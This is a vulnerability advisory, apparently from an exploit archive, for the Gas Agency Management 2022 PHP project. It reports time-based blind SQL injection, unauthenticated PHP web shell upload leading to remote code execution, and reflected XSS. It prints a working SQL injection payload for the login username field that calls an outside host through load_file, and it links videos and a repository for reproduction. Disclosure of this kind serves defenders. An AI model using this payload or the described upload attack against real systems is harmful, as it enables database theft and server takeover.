Headline
Gas Agency Management 2022 SQL Injection / XSS / Shell Upload
Gas Agency Management 2022 suffers from cross site scripting, remote SQL injection, and remote shell upload vulnerabilities.
## Title: Gas Agency Management-2022 by Mayuri K - SQLi+FU-RCE+XSS## Author: nu11secur1ty## Date: 08.12.2022## Vendor Homepage: https://www.mayurik.com/#download_section## Software Link-0:https://www.sourcecodester.com/php/15586/gas-agency-management-system-project-php-free-download-source-code.html## Software Link-1:https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/mayuri_k/2022/Gas-Agency-Management-2022/Docs/gasmark.zip## Description:The Gas Agency Management-2022 by Mayuri K suffers from multiplevulnerabilities, which means this project must be deprecatedimmediately!1. - SQLi: the parameter username is vulnerable to time-based blind(query SLEEP) injection - not sanitizing well.2. - Unauthenticated file upload - not sanitizing upload function -possible to upload .php extension files on photo section, for thecustomers.3. - XSS-reflected in the section adds customer in address function.4. - Web shell file upload - unauthenticated extension file upload, inthis case, is PHP web shell uploader. After this, the malicious usercan execute the already uploaded file remotely, and he can destroycompletely this flawed system.5. - STATUS: For termination of the project.[+]Payloads:```mysql---Parameter: username (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=mxiusQzi'+(selectload_file('\\\\alzg6yrkl2xieezgaz9zqnya91fu3lw9ncb4yumj.tupaciganka.com\\jfe'))+''AND (SELECT 9964 FROM (SELECT(SLEEP(5)))bVfa)--FygL&password=r8H!r2a!U2&login=---```[+]Unauthenticated Upload:- - - in the video:https://streamable.com/opqz3n[+]XSS-Reflected:- - - in the video:https://streamable.com/opqz3n[+]RCE:- - - in the video:https://streamable.com/opqz3n## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Gas-Agency-Management-2022)## Proof and Exploit:[href](https://streamable.com/opqz3n)-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>